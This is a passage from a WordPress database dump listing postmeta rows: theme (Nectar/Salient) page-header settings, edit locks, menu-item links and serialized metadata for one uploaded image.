grid_id\";a:0:{}}'),(1100,6236,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1101,6236,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1102,6236,'_wp_page_template','default'),(1103,6236,'_wpb_vc_js_status','true'),(1104,6236,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(1105,6236,'nectar-metabox-portfolio-display-sortable','off'),(1106,6236,'_nectar_slider_bg_type','image_bg'),(1107,6236,'_nectar_canvas_shapes',''),(1108,6236,'_nectar_media_upload_webm',''),(1109,6236,'_nectar_media_upload_mp4',''),(1110,6236,'_nectar_media_upload_ogv',''),(1111,6236,'_nectar_slider_preview_image',''),(1112,6236,'_nectar_header_bg',''),(1113,6236,'_nectar_header_parallax','off'),(1114,6236,'_nectar_header_box_roll','off'),(1115,6236,'_nectar_header_bg_height',''),(1116,6236,'_nectar_header_fullscreen','off'),(1117,6236,'_nectar_header_title',''),(1118,6236,'_nectar_header_subtitle',''),(1119,6236,'_nectar_page_header_text-effect','none'),(1120,6236,'_nectar_particle_rotation_timing',''),(1121,6236,'_nectar_particle_disable_explosion','off'),(1122,6236,'_nectar_page_header_alignment','left'),(1123,6236,'_nectar_page_header_alignment_v','middle'),(1124,6236,'_nectar_page_header_bg_alignment','center'),(1125,6236,'_nectar_header_bg_color',''),(1126,6236,'_nectar_header_font_color',''),(1127,6236,'_disable_transparent_header','off'),(1128,6236,'_force_transparent_header','off'),(1129,6236,'_nectar_full_screen_rows','off'),(1130,6236,'_nectar_full_screen_rows_animation','none'),(1131,6236,'_nectar_full_screen_rows_animation_speed','medium'),(1132,6236,'_nectar_full_screen_rows_overall_bg_color',''),(1133,6236,'_nectar_full_screen_rows_anchors','off'),(1134,6236,'_nectar_full_screen_rows_mobile_disable','off'),(1135,6236,'_nectar_full_screen_rows_row_bg_animation','none'),(1136,6236,'_nectar_full_screen_rows_dot_navigation','tooltip'),(1137,6236,'_nectar_full_screen_rows_content_overflow','scrollbar'),(1138,6236,'_nectar_full_screen_rows_footer','none'),(1139,6236,'_nectar_header_bg_overlay_color',''),(1141,6236,'_dp_original','6235'),(1142,6235,'_edit_lock','1513224664:1'),(1143,6236,'_edit_lock','1513224704:1'),(1144,6235,'_edit_last','1'),(1145,6236,'_edit_last','1'),(1146,6239,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1147,6239,'_menu_item_type','post_type'),(1148,6239,'_menu_item_menu_item_parent','6232'),(1149,6239,'_menu_item_object_id','6236'),(1150,6239,'_menu_item_object','page'),(1151,6239,'_menu_item_target',''),(1152,6239,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1153,6239,'_menu_item_xfn',''),(1154,6239,'_menu_item_url',''),(1156,6240,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1157,6240,'_menu_item_type','post_type'),(1158,6240,'_menu_item_menu_item_parent','6232'),(1159,6240,'_menu_item_object_id','6235'),(1160,6240,'_menu_item_object','page'),(1161,6240,'_menu_item_target',''),(1162,6240,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1163,6240,'_menu_item_xfn',''),(1164,6240,'_menu_item_url',''),(1166,6245,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1167,6245,'_edit_last','1'),(1168,6245,'_edit_lock','1513225609:1'),(1169,6245,'_wp_page_template','default'),(1170,6245,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(1171,6245,'nectar-metabox-portfolio-display-sortable','off'),(1172,6245,'_nectar_full_screen_rows','off'),(1173,6245,'_nectar_full_screen_rows_animation','none'),(1174,6245,'_nectar_full_screen_rows_animation_speed','medium'),(1175,6245,'_nectar_full_screen_rows_overall_bg_color',''),(1176,6245,'_nectar_full_screen_rows_anchors','off'),(1177,6245,'_nectar_full_screen_rows_mobile_disable','off'),(1178,6245,'_nectar_full_screen_rows_row_bg_animation','none'),(1179,6245,'_nectar_full_screen_rows_dot_navigation','tooltip'),(1180,6245,'_nectar_full_screen_rows_content_overflow','scrollbar'),(1181,6245,'_nectar_full_screen_rows_footer','none'),(1182,6245,'_nectar_slider_bg_type','image_bg'),(1183,6245,'_nectar_canvas_shapes',''),(1184,6245,'_nectar_media_upload_webm',''),(1185,6245,'_nectar_media_upload_mp4',''),(1186,6245,'_nectar_media_upload_ogv',''),(1187,6245,'_nectar_slider_preview_image',''),(1188,6245,'_nectar_header_bg',''),(1189,6245,'_nectar_header_parallax','off'),(1190,6245,'_nectar_header_box_roll','off'),(1191,6245,'_nectar_header_bg_height',''),(1192,6245,'_nectar_header_fullscreen','off'),(1193,6245,'_nectar_header_title',''),(1194,6245,'_nectar_header_subtitle',''),(1195,6245,'_nectar_page_header_text-effect','none'),(1196,6245,'_nectar_particle_rotation_timing',''),(1197,6245,'_nectar_particle_disable_explosion','off'),(1198,6245,'_nectar_page_header_alignment','left'),(1199,6245,'_nectar_page_header_alignment_v','middle'),(1200,6245,'_nectar_page_header_bg_alignment','center'),(1201,6245,'_nectar_header_bg_color',''),(1202,6245,'_nectar_header_font_color',''),(1203,6245,'_nectar_header_bg_overlay_color',''),(1204,6245,'_disable_transparent_header','off'),(1205,6245,'_force_transparent_header','off'),(1206,6245,'_wpb_vc_js_status','true'),(1207,6247,'_wp_attached_file','2017/12/84-treatment-b.jpg'),(1208,6247,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:700;s:4:\"file\";s:26:\"2017/12/84-treatment-b.jpg\";s:5:\"sizes\";a:13:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"84-treatment-b-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"84-treatment-b-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"portfolio-thumb\";a:4:{s:4:\"file\";s:26:\"84-treatment-b-600x403.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:403;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"portfolio-thumb_small\";a:4:{s:4:\"file\";s:26:\"84-treatment-b-400x269.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-widget\";a:4:{s:4:\"file\";s:26:\"84-treatment-b-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"nectar_small_square\";a:4:{s:4:\"file\";s:26:\"84-treatment-b-140x140.jpg\";s:5:\"width\";i:140;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"wide\";a:4:{s:4:\"file\";s:26:\"84-treatment-b-700x500.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wide_small\";a:4:{s:4:\"file\";s:26:\"84-treatment-b-670x335.jpg\";s:5:\"width\";i:670;s:6:\"height\";i:335;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"regular\";a:4:{s:4:\"file\";s:26:\"84-treatment-b-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"regular_small\";a:4:{s:4:\"file\";s:26:\"84-treatment-b-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"tall\";a:4:{s:4:\"file\";s:26:\"84-treatment-b-500x700.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:700;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"wide_photography\";a:4:{s:4:\"file\";s:26:\"84-treatment-b-700x600.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"large_featured\";a:4:{s:4:\"file\";s:26:\"84-treatment-b-700x700.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:700;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1210,6251,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1211,6251,'_edit_last','1'),(1212,6251,'_edit_lock','1514350108:1'),(1213,6251,'_wp_page_template','default'),(1214,6251,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(1215,6251,'nectar-metabox-portfolio-display-sortable','off'),(1216,6251,'_nectar_full_screen_rows','off'),(1217,6251,'_nectar_full_screen_rows_animation','none'),(1218,6251,'_nectar_full_screen_rows_animation_speed','medium'),(1219,6251,'_nectar_full_screen_rows_overall_bg_color',''),(1220,6251,'_nectar_full_screen_rows_anchors','off'),(1221,6251,'_nectar_full_screen_rows_mobile_disable','off'),(1222,6251,'_nectar_full_screen_rows_row_bg_animation','none'),(1223,6251,'_nectar_full_screen_rows_dot_navigation','tooltip'),(1224,6251,'_nectar_full_screen_rows_content_overflow','scrollbar'),(1225,6251,'_nectar_full_screen_rows_footer','none'),(1226,6251,'_nectar_slider_bg_type','image_bg'),(1227,6251,'_nectar_canvas_shapes',''),(1228,6251,'_nectar_media_upload_webm',''),(1229,6251,'_nectar_media_upload_mp4',''),(1230,6251,'_nectar_media_upload_ogv',''),(1231,6251,'_nectar_slider_preview_image',''),(1232,6251,'_nectar_header_bg',''),(1233,6251,'_nectar_header_parallax','off'),(1234,6251,'_nectar_header_box_roll','off'),(1235,6251,'_nectar_header_bg_height',''),(1236,6251,'_nectar_header_fullscreen','off'),(1237,6251,'_nectar_header_title',''),(1238,6251,'_nectar_header_subtitle',''),(1239,6251,'_nectar_page_header_text-effect','none'),(1240,6251,'_nectar_particle_rotation_timing',''),(1241,6251,'_nectar_particle_disable_explosion','off'),(1242,6251,'_nectar_page_header_alignment','left'),(1243,6251,'_nectar_page_header_alignment_v','middle'),(1244,6251,'_nectar_page_header_bg_alignment','center'),(1245,6251,'_nectar_header_bg_color',''),(1246,6251,'_nectar_header_font_color',''),(1247,6251,'_nectar_header_bg_overlay_color',''),(1248,6251,'_disable_transparent_header','off'),(1249,6251,'_force_transparent_header','off'),(1250,6251,'_wpb_vc_js_status','true'),(1251,6253,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1252,6253,'_edit_last','1'),(1253,6253,'_wp_page_template','default'),(1254,6253,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(1255,6253,'nectar-metabox-portfolio-display-sortable','off'),(1256,6253,'_nectar_full_screen_rows','off'),(1257,6253,'_nectar_full_screen_rows_animation','none'),(1258,6253,'_nectar_full_screen_rows_animation_speed','medium'),(1259,6253,'_nectar_full_screen_rows_overall_bg_color',''),(1260,6253,'_nectar_full_screen_rows_anchors','off'),(1261,6253,'_nectar_full_screen_rows_mobile_disable','off'),(1262,6253,'_nectar_full_screen_rows_row_bg_animation','none'),(1263,6253,'_nectar_full_screen_rows_dot_navigation','tooltip'),(1264,6253,'_nectar_full_screen_rows_content_overflow','scrollbar'),(1265,6253,'_nectar_full_screen_rows_footer','none'),(1266,6253,'_nectar_slider_bg_type','image_bg'),(1267,6253,'_nectar_canvas_shapes',''),(1268,6253,'_nectar_media_upload_webm',''),(1269,6253,'_nectar_media_upload_mp4',''),(1270,6253,'_nectar_media_upload_ogv',''),(1271,6253,'_nectar_slider_preview_image',''),(1272,6253,'_nectar_header_bg',''),(1273,6253,'_nectar_header_parallax','off'),(1274,6253,'_nectar_header_box_roll','off'),(1275,6253,'_nectar_header_bg_height',''),(1276,6253,'_nectar_header_fullscreen','off'),(1277,6253,'_nectar_header_title',''),(1278,6253,'_nectar_header_subtitle',''),(1279,6253,'_nectar_page_header_text-effect','none'),(1280,6253,'_nectar_particle_rotation_timing',''),(1281,6253,'_nectar_particle_disable_explosion','off'),(1282,6253,'_nectar_page_header_alignment','left'),(1283,6253,'_nectar_page_header_alignment_v','middle'),(1284,6253,'_nectar_page_header_bg_alignment','center'),(1285,6253,'_nectar_header_bg_color',''),(1286,6253,'_nectar_header_font_color',''),(1287,6253,'_nectar_header_bg_overlay_color',''),(1288,6253,'_disable_transparent_header','off'),(1289,6253,'_force_transparent_header','off'),(1290,6253,'_wpb_vc_js_status','false'),(1291,6253,'_edit_lock','1514350369:1'),(1292,6256,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1293,6256,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1294,6256,'_wp_page_template','default'),(1295,6256,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(1296,6256,'nectar-metabox-portfolio-display-sortable','off'),(1297,6256,'_nectar_full_screen_rows','off'),(1298,6256,'_nectar_full_screen_rows_animation','none'),(1299,6256,'_nectar_full_screen_rows_animation_speed','medium'),(1300,6256,'_nectar_full_screen_rows_overall_bg_color',''),(1301,6256,'_nectar_full_screen_rows_anchors','off'),(1302,6256,'_nectar_full_screen_rows_mobile_disable','off'),(1303,6256,'_nectar_full_screen_rows_row_bg_animation','none'),(1304,6256,'_nectar_full_screen_rows_dot_navigation','tooltip'),(1305,6256,'_nectar_full_screen_rows_content_overflow','scrollbar'),(1306,6256,'_nectar_full_screen_rows_footer','none'),(1307,6256,'_nectar_slider_bg_type','image_bg'),(1308,6256,'_nectar_canvas_shapes',''),(1309,6256,'_nectar_media_upload_webm',''),(1310,6256,'_nectar_media_upload_mp4',''),(1311,6256,'_nectar_media_upload_ogv',''),(1312,6256,'_nectar_slider_preview_image',''),(1313,6256,'_nectar_header_bg',''),(1314,6256,'_nectar_header_parallax','off'),(1315,6256,'_nectar_header_box_roll','off'),(1316,6256,'_nectar_header_bg_height',''),(1317,6256,'_nectar_header_fullscreen','off'),(1318,6256,'_nectar_header_title',''),(1319,6256,'_nectar_header_subtitle',''),(1320,6256,'_nectar_page_header_text-effect','none'),(1321,6256,'_nectar_particle_rotation_timing',''),(1322,6256,'_nectar_particle_disable_explosion','off'),(1323,6256,'_nectar_page_header_alignment','left'),(1324,6256,'_nectar_page_header_alignment_v','middle'),(1325,6256,'_nectar_page_header_bg_alignment','center'),(1326,6256,'_nectar_header_bg_color',''),(1327,6256,'_nectar_header_font_color',''),(1328,6256,'_nectar_header_bg_overlay_color',''),(1329,6256,'_disable_transparent_header','off'),(1330,6256,'_force_transparent_header','off'),(1331,6256,'_wpb_vc_js_status','false'),(1332,6256,'_dp_original','6253'),(1333,6256,'_edit_lock','1515646806:1'),(1334,6256,'_edit_last','1'),(1335,6258,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1336,6258,'_menu_item_type','post_type'),(1337,6258,'_menu_item_menu_item_parent','6191'),(1338,6258,'_menu_item_object_id','6256'),(1339,6258,'_menu_item_object','page'),(1340,6258,'_menu_item_target',''),(1341,6258,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1342,6258,'_menu_item_xfn',''),(1343,6258,'_menu_item_url',''),(1345,6259,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1346,6259,'_menu_item_type','post_type'),(1347,6259,'_menu_item_menu_item_parent','6258'),(1348,6259,'_menu_item_object_id','6253'),(1349,6259,'_menu_item_object','page'),(1350,6259,'_menu_item_target',''),(1351,6259,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1352,6259,'_menu_item_xfn',''),(1353,6259,'_menu_item_url',''),(1355,6260,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1356,6260,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1357,6260,'_wp_page_template','default'),(1358,6260,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(1359,6260,'nectar-metabox-portfolio-display-sortable','off'),(1360,6260,'_nectar_full_screen_rows','off'),(1361,6260,'_nectar_full_screen_rows_animation','none'),(1362,6260,'_nectar_full_screen_rows_animation_speed','medium'),(1363,6260,'_nectar_full_screen_rows_overall_bg_color',''),(1364,6260,'_nectar_full_screen_rows_anchors','off'),(1365,6260,'_nectar_full_screen_rows_mobile_disable','off'),(1366,6260,'_nectar_full_screen_rows_row_bg_animation','none'),(1367,6260,'_nectar_full_screen_rows_dot_navigation','tooltip'),(1368,6260,'_nectar_full_screen_rows_content_overflow','scrollbar'),(1369,6260,'_nectar_full_screen_rows_footer','none'),(1370,6260,'_nectar_slider_bg_type','image_bg'),(1371,6260,'_nectar_canvas_shapes',''),(1372,6260,'_nectar_media_upload_webm',''),(1373,6260,'_nectar_media_upload_mp4',''),(1374,6260,'_nectar_media_upload_ogv',''),(1375,6260,'_nectar_slider_preview_image',''),(1376,6260,'_nectar_header_bg',''),(1377,6260,'_nectar_header_parallax','off'),(1378,6260,'_nectar_header_box_roll','off'),(1379,6260,'_nectar_header_bg_height',''),(1380,6260,'_nectar_header_fullscreen','off'),(1381,6260,'_nectar_header_title',''),(1382,6260,'_nectar_header_subtitle',''),(1383,6260,'_nectar_page_header_text-effect','none'),(1384,6260,'_nectar_particle_rotation_timing',''),(1385,6260,'_nectar_particle_disable_explosion','off'),(1386,6260,'_nectar_page_header_alignment','left'),(1387,6260,'_nectar_page_header_alignment_v','middle'),(1388,6260,'_nectar_page_header_bg_alignment','center'),(1389,6260,'_nectar_header_bg_color',''),(1390,6260,'_nectar_header_font_color',''),(1391,6260,'_nectar_header_bg_overlay_color',''),(1392,6260,'_disable_transparent_header','off'),(1393,6260,'_force_transparent_header','off'),(1394,6260,'_wpb_vc_js_status','false'),(1395,6260,'_dp_original','6253'),(1396,6260,'_edit_lock','1514350433:1'),(1397,6260,'_edit_last','1'),(1398,6262,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1399,6262,'_menu_item_type','post_type'),(1400,6262,'_menu_item_menu_item_parent','6258'),(1401,6262,'_menu_item_object_id','6260'),(1402,6262,'_menu_item_object','page'),(1403,6262,'_menu_item_target',''),(1404,6262,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1405,6262,'_menu_item_xfn',''),(1406,6262,'_menu_item_url',''),(1408,6263,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1409,6263,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1410,6263,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1411,6263,'_wp_page_template','default'),(1412,6263,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(1413,6263,'nectar-metabox-portfolio-display-sortable','off'),(1414,6263,'_nectar_full_screen_rows','off'),(1415,6263,'_nectar_full_screen_rows_animation','none'),(1416,6263,'_nectar_full_screen_rows_animation_speed','medium'),(1417,6263,'_nectar_full_screen_rows_overall_bg_color',''),(1418,6263,'_nectar_full_screen_rows_anchors','off'),(1419,6263,'_nectar_full_screen_rows_mobile_disable','off'),(1420,6263,'_nectar_full_screen_rows_row_bg_animation','none'),(1421,6263,'_nectar_full_screen_rows_dot_navigation','tooltip'),(1422,6263,'_nectar_full_screen_rows_content_overflow','scrollbar'),(1423,6263,'_nectar_full_screen_rows_footer','none'),(1424,6263,'_nectar_slider_bg_type','image_bg'),(1425,6263,'_nectar_canvas_shapes',''),(1426,6263,'_nectar_media_upload_webm',''),(1427,6263,'_nectar_media_upload_mp4',''),(1428,6263,'_nectar_media_upload_ogv',''),(1429,6263,'_nectar_slider_preview_image',''),(1430,6263,'_nectar_header_bg',''),(1431,6263,'_nectar_header_parallax','off'),(1432,6263,'_nectar_header_box_roll','off'),(1433,6263,'_nectar_header_bg_height',''),(1434,6263,'_nectar_header_fullscreen','off'),(1435,6263,'_nectar_header_title',''),(1436,6263,'_nectar_header_subtitle',''),(1437,6263,'_nectar_page_header_text-effect','none'),(1438,6263,'_nectar_particle_rotation_timing',''),(1439,6263,'_nectar_particle_disable_explosion','off'),(1440,6263,'_nectar_page_header_alignment','left'),(1441,6263,'_nectar_page_header_alignment_v','middle'),(1442,6263,'_nectar_page_header_bg_alignment','center'),(1443,6263,'_nectar_header_bg_color',''),(1444,6263,'_nectar_header_font_color',''),(1445,6263,'_nectar_header_bg_overlay_color',''),(1446,6263,'_disable_transparent_header','off'),(1447,6263,'_force_transparent_header','off'),(1448,6263,'_wpb_vc_js_status','false'),(1450,6263,'_dp_original','6256'),(1451,6263,'_edit_lock','1514350642:1'),(1452,6263,'_edit_last','1'),(1453,6265,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1454,6265,'_menu_item_type','post_type'),(1455,6265,'_menu_item_menu_item_parent','6258'),(1456,6265,'_menu_item_object_id','6263'),(1457,6265,'_menu_item_object','page'),(1458,6265,'_menu_item_target',''),(1459,6265,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1460,6265,'_menu_item_xfn',''),(1461,6265,'_menu_item_url',''),(1463,6266,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1464,6266,'_edit_last','1'),(1465,6266,'_wp_page_template','default'),(1466,6266,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(1467,6266,'nectar-metabox-portfolio-display-sortable','off'),(1468,6266,'_nectar_full_screen_rows','off'),(1469,6266,'_nectar_full_screen_rows_animation','none'),(1470,6266,'_nectar_full_screen_rows_animation_speed','medium'),(1471,6266,'_nectar_full_screen_rows_overall_bg_color',''),(1472,6266,'_nectar_full_screen_rows_anchors','off'),(1473,6266,'_nectar_full_screen_rows_mobile_disable','off'),(1474,6266,'_nectar_full_screen_rows_row_bg_animation','none'),(1475,6266,'_nectar_full_screen_rows_dot_navigation','tooltip'),(1476,6266,'_nectar_full_screen_rows_content_overflow','scrollbar'),(1477,6266,'_nectar_full_screen_rows_footer','none'),(1478,6266,'_nectar_slider_bg_type','image_bg'),(1479,6266,'_nectar_canvas_shapes',''),(1480,6266,'_nectar_media_upload_webm',''),(1481,6266,'_nectar_media_upload_mp4',''),(1482,6266,'_nectar_media_upload_ogv',''),(1483,6266,'_nectar_slider_preview_image',''),(1484,6266,'_nectar_header_bg',''),(1485,6266,'_nectar_header_parallax','off'),(1486,6266,'_nectar_header_box_roll','off'),(1487,6266,'_nectar_header_bg_height',''),(1488,6266,'_nectar_header_fullscreen','off'),(1489,6266,'_nectar_header_title',''),(1490,6266,'_nectar_header_subtitle',''),(1491,6266,'_nectar_page_header_text-effect','none'),(1492,6266,'_nectar_particle_rotation_timing',''),(1493,6266,'_nectar_particle_disable_explosion','off'),(1494,6266,'_nectar_page_header_alignment','left'),(1495,6266,'_nectar_page_header_alignment_v','middle'),(1496,6266,'_nectar_page_header_bg_alignment','center'),(1497,6266,'_nectar_header_bg_color',''),(1498,6266,'_nectar_header_font_color',''),(1499,6266,'_nectar_header_bg_overlay_color',''),(1500,6266,'_disable_transparent_header','off'),(1501,6266,'_force_transparent_header','off'),(1502,6266,'_wpb_vc_js_status','false'),(1503,6266,'_edit_lock','1514350746:1'),(1504,6268,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1505,6268,'_menu_item_type','post_type'),(1506,6268,'_menu_item_menu_item_parent','0'),(1507,6268,'_menu_item_object_id','6266'),(1508,6268,'_menu_item_object','page'),(1509,6268,'_menu_item_target',''),(1510,6268,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1511,6268,'_menu_item_xfn',''),(1512,6268,'_menu_item_url',''),(1514,6269,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1515,6269,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1516,6269,'_wp_page_template','default'),(1517,6269,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(1518,6269,'nectar-metabox-portfolio-display-sortable','off'),(1519,6269,'_nectar_full_screen_rows','off'),(1520,6269,'_nectar_full_screen_rows_animation','none'),(1521,6269,'_nectar_full_screen_rows_animation_speed','medium'),(1522,6269,'_nectar_full_screen_rows_overall_bg_color',''),(1523,6269,'_nectar_full_screen_rows_anchors','off'),(1524,6269,'_nectar_full_screen_rows_mobile_disable','off'),(1525,6269,'_nectar_full_screen_rows_row_bg_animation','none'),(1526,6269,'_nectar_full_screen_rows_dot_navigation','tooltip'),(1527,6269,'_nectar_full_screen_rows_content_overflow','scrollbar'),(1528,6269,'_nectar_full_screen_rows_footer','none'),(1529,6269,'_nectar_slider_bg_type','image_bg'),(1530,6269,'_nectar_canvas_shapes',''),(1531,6269,'_nectar_media_upload_webm',''),(1532,6269,'_nectar_media_upload_mp4',''),(1533,6269,'_nectar_media_upload_ogv',''),(1534,6269,'_nectar_slider_preview_image',''),(1535,6269,'_nectar_header_bg',''),(1536,6269,'_nectar_header_parallax','off'),(1537,6269,'_nectar_header_box_roll','off'),(1538,6269,'_nectar_header_bg_height',''),(1539,6269,'_nectar_header_fullscreen','off'),(1540,6269,'_nectar_header_title',''),(1541,6269,'_nectar_header_subtitle',''),(1542,6269,'_nectar_page_header_text-effect','none'),(1543,6269,'_nectar_particle_rotation_timing',''),(1544,6269,'_nectar_particle_disable_explosion','off'),(1545,6269,'_nectar_page_header_alignment','left'),(1546,6269,'_nectar_page_header_alignment_v','middle'),(1547,6269,'_nectar_page_header_bg_alignment','center'),(1548,6269,'_nectar_header_bg_color',''),(1549,6269,'_nectar_header_font_color',''),(1550,6269,'_nectar_header_bg_overlay_color',''),(1551,6269,'_disable_transparent_header','off'),(1552,6269,'_force_transparent_header','off'),(1553,6269,'_wpb_vc_js_status','true'),(1554,6269,'_dp_original','6266'),(1555,6269,'_edit_lock','1515645644:1'),(1556,6269,'_edit_last','1'),(1557,6271,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1558,6271,'_menu_item_type','post_type'),(1559,6271,'_menu_item_menu_item_parent','6268'),(1560,6271,'_menu_item_object_id','6269'),(1561,6271,'_menu_item_object','page'),(1562,6271,'_menu_item_target',''),(1563,6271,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1564,6271,'_menu_item_xfn',''),(1565,6271,'_menu_item_url',''),(1567,6272,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1568,6272,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1569,6272,'_wp_page_template','default'),(1570,6272,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(1571,6272,'nectar-metabox-portfolio-display-sortable','off'),(1572,6272,'_nectar_full_screen_rows','off'),(1573,6272,'_nectar_full_screen_rows_animation','none'),(1574,6272,'_nectar_full_screen_rows_animation_speed','medium'),(1575,6272,'_nectar_full_screen_rows_overall_bg_color',''),(1576,6272,'_nectar_full_screen_rows_anchors','off'),(1577,6272,'_nectar_full_screen_rows_mobile_disable','off'),(1578,6272,'_nectar_full_screen_rows_row_bg_animation','none'),(1579,6272,'_nectar_full_screen_rows_dot_navigation','tooltip'),(1580,6272,'_nectar_full_screen_rows_content_overflow','scrollbar'),(1581,6272,'_nectar_full_screen_rows_footer','none'),(1582,6272,'_nectar_slider_bg_type','image_bg'),(1583,6272,'_nectar_canvas_shapes',''),(1584,6272,'_nectar_media_upload_webm',''),(1585,6272,'_nectar_media_upload_mp4',''),(1586,6272,'_nectar_media_upload_ogv',''),(1587,6272,'_nectar_slider_preview_image',''),(1588,6272,'_nectar_header_bg',''),(1589,6272,'_nectar_header_parallax','off'),(1590,6272,'_nectar_header_box_roll','off'),(1591,6272,'_nectar_header_bg_height',''),(1592,6272,'_nectar_header_fullscreen','off'),(1593,6272,'_nectar_header_title',''),(1594,6272,'_nectar_header_subtitle',''),(1595,6272,'_nectar_page_header_text-effect','none'),(1596,6272,'_nectar_particle_rotation_timing',''),(1597,6272,'_nectar_particle_disable_explosion','off'),(1598,6272,'_nectar_page_header_alignment','left'),(1599,6272,'_nectar_page_header_alignment_v','middle'),(1600,6272,'_nectar_page_header_bg_alignment','center'),(1601,6272,'_nectar_header_bg_color',''),(1602,6272,'_nectar_header_font_color',''),(1603,6272,'_nectar_header_bg_overlay_color',''),(1604,6272,'_disable_transparent_header','off'),(1605,6272,'_force_transparent_header','off'),(1606,6272,'_wpb_vc_js_status','false'),(1607,6272,'_dp_original','6266'),(1608,6272,'_edit_lock','1514350932:1'),(1609,6272,'_edit_last','1'),(1610,6274,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1611,6274,'_menu_item_type','post_type'),(1612,6274,'_menu_item_menu_item_parent','6268'),(1613,6274,'_menu_item_object_id','6272'),(1614,6274,'_menu_item_object','page'),(1615,6274,'_menu_item_target',''),(1616,6274,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1617,6274,'_menu_item_xfn',''),(1618,6274,'_menu_item_url',''),(1620,6275,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1621,6275,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1622,6275,'_wp_page_template','default'),(1623,6275,'nectar-metabox-portfolio-display','a:1